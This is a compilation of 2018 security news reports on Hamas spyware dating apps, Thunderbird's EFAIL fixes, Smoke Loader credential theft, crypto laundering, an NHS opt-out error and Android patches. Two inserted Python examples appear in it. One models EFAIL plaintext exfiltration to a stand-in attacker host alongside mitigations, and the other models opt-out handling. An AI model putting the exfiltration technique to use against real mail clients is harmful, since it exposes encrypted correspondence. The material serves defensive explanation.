Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.
The Israeli military has already blamed Hamas for similar attacks, but this time the hackers managed to distribute the apps through the official Google Play Store to increase their chances of success.
Experts from the Israeli firm ClearSky identified the following apps:
WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (World Cup app)
Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations and then trick them into installing one of the malicious apps.
Israeli military officials explained that Hamas operatives used the same tactic in a campaign launched in January.
In January the hackers used the profile of a woman named “Elianna Amer”; in these latest attacks, which lasted at least three months, they used the profile of a woman named “Lina Kramer.”
“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.
“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”
According to Israeli army intelligence officers, the attacks failed to damage military security.
“No damage was done, as we stopped it in time,” one of the officers said.
The Israeli newspaper Haaretz gave a different version of events, reporting that at least “hundreds” of soldiers were infected.
“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.
“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”
Analysis of the apps revealed that they contained spyware able to take over the device and exfiltrate sensitive data.
According to the experts, the threat actor behind these attacks is tracked as Arid Viper.
In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. The operation was run by Arabic-speaking hackers who sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government offices, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait.
In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).
Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs Vulnerebility
The Thunderbird team has released a new version of the popular email client that addresses many security issues, including the EFAIL vulnerability.
Thunderbird 52.9 addresses a dozen security vulnerabilities, including the EFAIL encryption issue disclosed in May.
The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.
“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.
“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”
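The exfiltration channel described in that quote, reduced to a runnable model. This is an added example rather than Thunderbird code or the EFAIL authors' proof of concept: `decrypt()` stands in for real S/MIME or PGP decryption, and the attacker host, the message parts and the plaintext are constructed. It shows how a client that decrypts the captured ciphertext and renders the three MIME parts as one HTML document turns the plaintext into part of an image URL, and how rendering each part in isolation plus blocking remote content closes the channel (the Thunderbird fixes in this article concern the reply/forward variant of the same problem).

```python
"""EFAIL-style direct exfiltration against a naive HTML mail renderer.

Added example: not Thunderbird code, not the EFAIL authors' PoC. The host
name, message parts and plaintext below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

ATTACKER = "http://attacker.example/collect?p="          # constructed
PLAINTEXT = "Secret: wire 50k to account 12345 tomorrow"  # constructed

# A MIME part: (content-type, body, is_encrypted). The attacker wraps the
# victim's original ciphertext (part 2) between two HTML fragments so that
# the three parts, once decrypted and joined, form one <img> tag whose src
# ends with the plaintext.
ATTACKER_MESSAGE = [
    ("text/html", '<img src="' + ATTACKER, False),
    ("application/pkcs7-mime", "<ciphertext captured earlier>", True),
    ("text/html", '">', False),
]

# A second message with a complete remote image, for the remote-content check.
TRACKING_MESSAGE = [
    ("text/html", '<img src="http://attacker.example/track.gif">', False),
    ("application/pkcs7-mime", "<ciphertext captured earlier>", True),
]


def decrypt(part):
    """Stand-in for S/MIME or PGP decryption: the client holds the victim's
    key, so the encrypted part becomes PLAINTEXT."""
    _ctype, body, encrypted = part
    return PLAINTEXT if encrypted else body


class RemoteLoads(HTMLParser):
    """Collect the http(s) URLs a renderer would fetch for <img src> and <link href>."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        url = attrs.get("src") if tag == "img" else attrs.get("href") if tag == "link" else None
        if url and urlsplit(url).scheme in ("http", "https"):
            self.urls.append(url)


def remote_loads(html):
    parser = RemoteLoads()
    parser.feed(html)
    parser.close()
    return parser.urls


def naive_render(parts):
    """Vulnerable: decrypt every part and render them as one HTML document.
    Returns the joined document and the URLs the renderer would fetch."""
    html = "".join(decrypt(p) for p in parts)
    return html, remote_loads(html)


def hardened_render(parts, load_remote=False):
    """Two mitigations: each MIME part is parsed as its own document, so the
    attacker's unclosed tag never reaches the decrypted text, and remote
    content is not fetched unless the user opts in. Returns (fetched, blocked)."""
    fetched, blocked = [], []
    for part in parts:
        for url in remote_loads(decrypt(part)):
            (fetched if load_remote else blocked).append(url)
    return fetched, blocked


if __name__ == "__main__":
    _, urls = naive_render(ATTACKER_MESSAGE)
    print("naive renderer fetches:", urls)            # plaintext inside the URL
    print("hardened, default:", hardened_render(ATTACKER_MESSAGE))
    print("hardened, remote allowed:", hardened_render(ATTACKER_MESSAGE, load_remote=True))
    print("tracking pixel, hardened:", hardened_render(TRACKING_MESSAGE))
```

Part isolation is the mitigation that matters: with it, even a user who turns remote content back on gets at most the attacker's own tracking pixel, never a URL carrying the decrypted text. Blocking remote content alone would stop this particular channel but leaves the document structure unchanged, which is why the EFAIL paper treats it as a stopgap.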
Thunderbird 52.9 addresses CVE-2018-12372, which allows attackers to build S/MIME and PGP decryption oracles out of HTML messages.
“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.
The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.
Thunderbird 52.9 also addresses some critical flaws, such as CVE-2018-12359, a buffer overflow in canvas rendering that results in a potentially exploitable crash.
“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”
The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.
“A use-after-free vulnerability can occur when deleting an input element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.
Another issue concerns SettingContent-ms files: security researcher Matt Nelson found that Windows 10 users were not warned when opening files of this type. Tracked as CVE-2018-12368, the issue could be used to execute arbitrary code by tricking users into opening such a file.
“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the ‘Mark of the Web.’” continues the advisory.
“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.
Thunderbird also addressed some memory safety bugs that derived from the Firefox code base.
The good news is that the bugs are not directly exploitable in the e-mail client because scripting is disabled while users are reading messages.
New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.2018 securityaffairs Virus
Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.
Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.
The attack chain starts with messages carrying a weaponized Word document as an attachment; the hackers attempt to trick victims into opening it and enabling the embedded macro.
Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.
Smoke Loader is a tiny dropper normally used to install other malware families on the infected system, but in this specific campaign the experts observed an inversion of roles, with TrickBot downloading it.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.
“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,”
While malware frequently iterates through process lists to find a process to inject, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of explorer.exe.
The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.
The malware also implements several anti-analysis techniques, including anti-debugging and anti-VM checks, and threads that scan for processes and windows belonging to analysis tools.
The Smoke Loader variant used in this campaign was receiving five plugins, each of which was executed in its own Explorer.exe process.
The plugins were designed to steal sensitive information from the infected machine, including stored credentials and other sensitive data managed by the web browser.
“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.
The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.
The second plugin recursively searches through directories looking for files to parse and exfiltrate.
The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.
The fifth plugin injects code into TeamViewer.exe to steal credentials.
“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.
“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.
CipherTrace Unveils Crypto-Currency Anti-Money Laundering Solution
5.7.2018 securityweek Cryptocurrency
Cryptocurrency theft and its use to launder other illegal activity is booming. This has prompted the evolution of a related industry that sits on the borderline of legality (barely legal in some jurisdictions, illegal in others): cryptocurrency money laundering. The laundering of illegally-obtained money may be illegal, but the process used may not be.
CoinMixer is one such service that is advertised on Google Search. It says of its service, "Generally there is no link between the original transactions and the final address of the coins. This process protects your privacy and prevents other people tracing your payments on the internet." While this process can help with possibly legitimate privacy concerns, it is precisely what is required for money laundering.
Menlo Park, Calif. startup CipherTrace is a firm founded on the need for cryptocurrency anti-money laundering (AML), blockchain forensics and enforcement solutions. It aids law enforcement and financial regulators in their investigations, helps enterprises to deploy real-world cryptocurrency transactional systems within regulations, and offers a bitcoin scam and theft asset recovery service.
The CipherTrace Cryptocurrency Anti-Money Laundering Report for Q2, 2018 (PDF) shows the size of the problem; and highlights some of the regulatory discussions happening at international levels. Stolen cryptocurrency alone reached more than $750 million in the first half of 2018 -- which is already nearly three times the amount stolen in 2017. The report also adds, "The FBI noted that the value of virtual currencies contained in the Internet Crime Center 2017 reports were $58.3M, citing cyber actor demands of ransom payments, typically in virtual currency such as Bitcoin."
All this currency needs to be laundered before it can be safely accessed by the criminals. This is typically done through sites offering mixers, tumblers and chain hopping services. "The more dirty crypto money that goes into the systems and the more it moves around, the harder it becomes for investigators to see through the web of action and trace a path back to the source."
Governments and law enforcement agencies are not ignoring the use of cryptocurrencies to launder illegal gains. At the 5th Annual Europol Virtual Currency Conference, which was held at the Hague in the Netherlands, Jamal El-Hindi of the U.S. Financial Crimes Enforcement Network (FinCEN) reiterated FinCEN's position. "We will hold accountable foreign-located money transmitters, including virtual currency exchangers, that do business in the United States when they willfully violate U.S. AML laws."
The cryptocurrency theft problem that fosters the cryptocurrency laundering industry shows no sign of slowing down. It ranges from the theft of individual wallets and the use of various cryptocurrencies in ransomware extortion to major thefts from large cryptocurrency exchanges.
"Cybercriminals follow easy money," comments High-Tech Bridge CEO Ilia Kolochenko, "and many cryptocurrency owners are the perfect victims. They are virtually unable to protect either themselves or their digital assets, being susceptible even to relatively simple phishing attacks. Law enforcement is frequently uninterested in investigating and prosecuting petty offences with digital coins theft, as they are already under water with highly-sophisticated nationwide hacks."
He points out that cryptocurrency startups are often ignorant of the fundamentals of cybersecurity, and devote all their efforts and resources to survival in an extremely volatile and highly-competitive market.
"We can almost certainly expect further proliferation of security incidents related to crypto currencies. Attackers have now established impressive infrastructure purposely tailored for large-scale theft and scams with digital coins. Owners of the crypto assets should remain extremely vigilant, maintain all their devices and installed software up-to-date, install at least a free antivirus from a reputable vendor, use two-factor authentication and unique passwords, and never entrust their wallets to any third-parties unless they have a very good reason to utterly trust them."
F-Secure security advisor Sean Sullivan has advocated for a form of 'Know Your Customer' regulation to be applied to cryptocurrency exchanges. "Bitcoin exchange accounts could be required to be tied to a physical address," Sullivan said. Currently it takes just minutes -- or seconds -- to open a Bitcoin account in a third-party market. This would require an activation code that's mailed to you before an account can be opened. While this wouldn't affect criminals who do business out of Russia and China, it would make their attacks far less profitable; and would make the tracking of illegally acquired cryptocurrency by law enforcement considerably easier.
"The exchanges would hate it. But given the hundreds of millions of dollars being extorted every few months, it seems appropriate," Sullivan says. "Barring this or a similar step, exponential growth of malware families delivering these threats seems to be the only other option."
NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.2018 securityweek BigBrothers
On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.
"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."
NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.
On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."
It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.
The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.
It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.
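The failure described above is a fail-open default: when the GP system never relayed an objection, the dissemination pipeline treated the absence of a recorded opt-out as consent. The following is an added illustration, not NHS Digital or TPP code; the patient identifiers and the preference feed are constructed, and the fail-safe variant shows the alternative design in which only an explicitly received preference permits sharing and any missing preference is withheld and reported.

```python
"""Fail-open vs fail-safe handling of patient data-sharing objections.

Added example, not NHS Digital or TPP code. It models the reported failure:
some opt-outs were never relayed by the GP system, and because the pipeline
treated "no objection on file" as consent, those patients' data was shared.
"""
from dataclasses import dataclass, field
from enum import Enum


class Preference(Enum):
    OPT_OUT = "opt_out"              # patient objected to secondary use
    NO_OBJECTION = "no_objection"    # patient explicitly did not object


@dataclass
class Dissemination:
    shared: list = field(default_factory=list)
    withheld: list = field(default_factory=list)
    missing_preference: list = field(default_factory=list)   # needs follow-up


def disseminate_fail_open(patients, received_prefs):
    """Mirrors the flawed behaviour: absence of an objection counts as consent."""
    result = Dissemination()
    for pid in patients:
        if received_prefs.get(pid) == Preference.OPT_OUT:
            result.withheld.append(pid)
        else:
            result.shared.append(pid)          # P3 leaks here
    return result


def disseminate_fail_safe(patients, received_prefs):
    """Share only on an explicit, received preference; unknown means withhold."""
    result = Dissemination()
    for pid in patients:
        pref = received_prefs.get(pid)
        if pref is Preference.NO_OBJECTION:
            result.shared.append(pid)
        else:
            result.withheld.append(pid)
            if pref is None:                   # feed gap: flag for reconciliation
                result.missing_preference.append(pid)
    return result


# Constructed sample: P2's opt-out arrived, but the (hypothetical) GP-system
# export dropped P3's preference entirely, as happened in the TPP coding error.
PATIENTS = ["P1", "P2", "P3"]
RECEIVED = {"P1": Preference.NO_OBJECTION, "P2": Preference.OPT_OUT}

if __name__ == "__main__":
    print("fail-open :", disseminate_fail_open(PATIENTS, RECEIVED))
    print("fail-safe :", disseminate_fail_safe(PATIENTS, RECEIVED))
```

A non-empty `missing_preference` list is the signal a reconciliation step should raise back to the supplier before any release, which is the check the page says was absent for more than two years.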
"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."
It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.
Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."
NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."
Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek Vulnerebility
Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.
The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, including three rated Critical and eight rated High risk. The issues impact framework, media framework, and system.
All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.
“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.
Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.
A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.
These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.
Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.
Six vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.
All of the 4 flaws addressed in Kernel components were elevation of privilege bugs.
This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.
Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.
Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.
Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.